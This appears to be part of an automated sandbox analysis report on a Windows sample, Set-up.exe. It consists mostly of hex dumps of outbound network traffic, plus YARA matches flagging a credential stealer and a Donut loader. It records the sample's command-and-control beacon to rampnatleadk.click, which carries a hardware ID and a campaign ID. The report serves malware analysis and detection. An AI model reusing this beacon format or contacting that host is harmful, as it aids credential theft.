                                                                                    2025-01-12 14:20:23 UTC15331OUTData Raw: 81 df 8e 3c 5a da ca f4 32 de 27 b2 e1 e5 28 a0 50 dd f3 d2 1b 53 34 7c 19 87 47 7c ff 9d 8e 1d 2b 5e 30 27 f1 7f dd 6c 47 d4 01 69 a7 2a a3 9b d9 e6 a9 be 4f 1c 5c f9 27 75 47 ac 33 0f a2 48 10 26 94 f6 d8 23 c7 e6 6b 21 30 fb 2c 14 22 ca 65 29 43 8e c2 bd 27 39 5a e7 d2 b8 f7 7a d0 31 7d 78 97 8b c4 40 de fb 91 16 6d 9b 9a b5 a2 59 1e 72 25 6b 9a 99 23 d4 29 1a ee 22 59 1c 51 7d 04 58 8c 66 6a a0 be 63 7b ff d2 86 2b 1a ae e2 20 b5 06 6c ec d5 c8 72 c8 da d1 5e 02 f0 d4 38 41 c4 a1 10 3c ab d8 39 3b 4b 64 92 75 78 f0 fb 15 4a e5 ae db 4a cc 91 09 96 a5 58 16 36 ec e7 af 56 ff df 05 be cc c3 cc 92 e2 63 c2 0b 97 63 32 75 30 c6 e7 c9 be bc b3 32 71 86 e2 58 8e 34 f4 7a 24 6e b6 38 46 5c 75 20 cc 38 49 d5 93 83 68 13 39 ca 42 9b da 52 b7 45 37 cf 01 43 31
                                                                                    Data Ascii: <Z2'(PS4|G|+^0'lGi*O\'uG3H&#k!0,"e)C'9Zz1}x@mYr%k#)"YQ}Xfjc{+ lr^8A<9;KduxJJX6Vcc2u02qX4z$n8F\u 8Ih9BRE7C1
                                                                                    2025-01-12 14:20:23 UTC15331OUTData Raw: 62 b9 94 11 97 53 9b d2 08 cf 65 e7 4c e3 26 f4 29 44 68 24 d6 0b a9 4e 5d cd 4e dd f5 06 03 5c ce af cb b1 e2 9d f1 f2 c1 df 7d 61 6d 7c 71 d2 37 df a1 fc 6b 53 19 2c bd 1d 7b 59 44 46 13 ba 49 56 11 c1 54 ec 35 48 d8 a8 e2 10 ee e5 98 ee ef 1f 89 a2 28 8c de 5a 25 57 1e e7 e8 d5 57 73 53 fe 01 3d 8a 90 86 d1 31 ad 95 ea 65 0f 6b 4b 9c 98 c8 b0 fa 94 10 ce ed e3 4f 2e b0 2a 1d 9c 3a 92 7b 24 34 f9 c8 c9 f3 ff 4e 9b b1 48 eb a2 3b ec 88 92 6f 6c b1 6d b3 72 51 2b 3d a7 a1 8c 6c 9f c4 9d 17 97 a6 0d 47 3f d9 41 9f 79 9e c0 67 b1 60 5e b8 2f fd 1c d0 5a 38 40 2c 41 20 8e f2 6e ca f6 5f 49 1b c0 02 72 38 74 8e 0f 94 5b b9 ff f2 76 3f f9 04 74 1e e1 c4 d8 a4 45 e4 9f ba e5 41 74 6a 70 f4 cb aa 40 cf 10 4e e5 ab 4d 71 26 d0 2e c7 9a 96 b2 d3 7d fc 28 29 92 9f
                                                                                    Data Ascii: bSeL&)Dh$N]N\}am|q7kS,{YDFIVT5H(Z%WWsS=1ekKO.*:{$4NH;olmrQ+=lG?Ayg`^/Z8@,A n_Ir8t[v?tEAtjp@NMq&.}()
                                                                                    2025-01-12 14:20:23 UTC15331OUTData Raw: 3d 4f 8d b0 a0 a7 67 84 3e 7a b7 41 7f e8 c4 80 6f fa 93 d6 ee cf 0f f3 cd 04 79 b7 e6 ed 3f 19 51 ff 77 4b 4c 10 84 f8 2c 2e a2 81 36 fe 0a 0e bc 45 17 0a a0 86 c9 64 c9 7f 82 d3 b4 7d 12 37 8f d5 58 1a f3 fb ea 20 18 30 e0 04 39 47 96 da 8b a2 07 38 14 2a 0d 73 25 0f f7 4b 8d b8 c6 63 47 54 e9 02 18 6d 96 67 34 35 18 e0 d7 1f b3 c6 56 00 9f 8a f9 e0 71 91 37 5b 71 fb a6 ad d0 bc 76 3e 7c 66 ce 54 cd 89 53 9b cf 2a 52 8d 79 05 c7 c4 ef 41 b0 51 b7 fe fa 15 07 09 d4 f5 84 09 08 dc 20 e0 1a 70 f5 ca 51 21 bb a9 fc 00 c2 41 2b c4 bd a1 3b b9 76 ad 39 b3 64 17 1b 53 a7 11 ec 65 4b bc 07 e6 35 3a 89 90 74 b0 c6 18 9d b4 89 28 c0 6d 9f cd 49 a0 0b 08 fc 9a b2 29 b4 b1 b5 0d cc dc 1b 5b fe c5 6b 4b 99 5a 8f a0 58 9f cc f2 f1 51 5c 82 4a ed c4 32 eb 0e 1f 1c 6a
                                                                                    Data Ascii: =Og>zAoy?QwKL,.6Ed}7X 09G8*s%KcGTmg45Vq7[qv>|fTS*RyAQ pQ!A+;v9dSeK5:t(mI)[kKZXQ\J2j
                                                                                    2025-01-12 14:20:23 UTC15331OUTData Raw: 3a ce eb d3 04 be da ff df 4b 6f ac e3 f4 4e 66 42 7c 4c 62 d9 4e 43 5e e6 5d 35 2f 41 c4 1b b3 e8 b1 c6 44 c0 b0 3b 0a f2 0f cf a8 40 f9 bf cc 98 ee 0e c3 17 af 7e 11 ad dc 79 b3 98 ad 81 80 c8 2f ae a9 a7 bd 59 57 f3 c3 19 09 f9 4b 35 13 2e 53 f0 44 6d 13 a9 02 ad 2e 60 d9 ba 23 f4 28 0c c3 d4 a0 18 b5 42 53 9c b7 fb f5 e5 22 95 94 09 00 3b 39 7a c7 f9 1b 43 be b3 03 3d 3d a4 0f b8 ce 1f 18 ad 09 ef b9 2d e0 18 b4 f0 6a de 5e 85 d8 42 cf f2 18 ac 94 1b 2c b9 eb 92 2f b6 30 10 26 15 e9 dd ac dc 31 b6 54 ac 4d 8f a2 d6 cd 7a e4 85 20 dc 0b 18 fb 73 7d ec 15 61 10 e2 3d 37 2b 0f 87 f9 41 af 35 93 26 3e ec 49 81 45 1d 3f 51 25 59 b3 7d 15 dc f7 92 41 4e bb c9 36 2c 8f 11 68 fd b9 a6 0b c5 7b 54 4d 45 1b 64 04 4c 9e 79 b6 3c ba 71 ec 3b aa 5d a3 d0 5f 68 73
                                                                                    Data Ascii: :KoNfB|LbNC^]5/AD;@~y/YWK5.SDm.`#(BS";9zC==-j^B,/0&1TMz s}a=7+A5&>IE?Q%Y}AN6,h{TMEdLy<q;]_hs
                                                                                    2025-01-12 14:20:26 UTC1133INHTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=kjl5o98ma5n64gp3g8je05frd9; expires=Thu, 08 May 2025 08:07:04 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1a8rCCrVhViToZMOjTQBQqmXT1o6uIbtKGRMjoQgjp0lSeHcLFY9KWhCSL1HuiK537vsXbWHYYqGEXoN%2BuNXZEKz8QQhIFMWRU0MWpG6bs3%2BsQfo0TsJWB0r7QDv1LK0VYXVJ18%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc976efed4322-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1828&rtt_var=689&sent=191&recv=567&lost=0&retrans=0&sent_bytes=2845&recv_bytes=552147&delivery_rate=1597374&cwnd=221&unsent_bytes=0&cid=f78e6e91874ca58f&ts=2834&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.449745172.67.139.1444437104C:\Users\user\Desktop\Set-up.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-12 14:20:26 UTC266OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 84
                                                                                    Host: rampnatleadk.click
                                                                                    2025-01-12 14:20:26 UTC84OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 66 42 6b 43 6d 75 2d 2d 6e 65 78 74 32 6b 24 26 6a 3d 26 68 77 69 64 3d 38 30 31 46 30 45 42 41 42 39 33 42 39 34 37 42 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41
                                                                                    Data Ascii: act=get_message&ver=4.0&lid=fBkCmu--next2k$&j=&hwid=801F0EBAB93B947BB960CC18D99B375A
                                                                                    2025-01-12 14:20:27 UTC1124INHTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=m20qv8r9thpomchtvbfu42dop4; expires=Thu, 08 May 2025 08:07:06 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x1QC4xpMohwvaCgXUFszks4nMC8WmoDhfg21qJO7YNiaCqixhnMQlch3sU5BwRT70sy22%2Fb6cTB0Kzg5F8jMy3cT6JJaicFLQpRG2vurEOOXdirdTzgYz3uAdSp3hfpZwYZzX3E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc98ade804390-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1700&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=986&delivery_rate=1682027&cwnd=243&unsent_bytes=0&cid=4eec4aaf36e74a79&ts=1362&x=0"
                                                                                    2025-01-12 14:20:27 UTC54INData Raw: 33 30 0d 0a 48 7a 58 39 42 57 79 43 6f 33 79 75 71 37 74 67 59 67 4f 45 4e 7a 70 50 39 7a 58 5a 73 4a 32 65 75 46 55 55 63 2f 45 6e 43 2f 6c 45 61 41 3d 3d 0d 0a
                                                                                    Data Ascii: 30HzX9BWyCo3yuq7tgYgOENzpP9zXZsJ2euFUUc/EnC/lEaA==
                                                                                    2025-01-12 14:20:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:09:20:05
                                                                                    Start date:12/01/2025
                                                                                    Path:C:\Users\user\Desktop\Set-up.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:73'935'792 bytes
                                                                                    MD5 hash:7A7570C5AFC5BF3D53854F4AE9E61457
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1841233829.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1840272460.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    No disassembly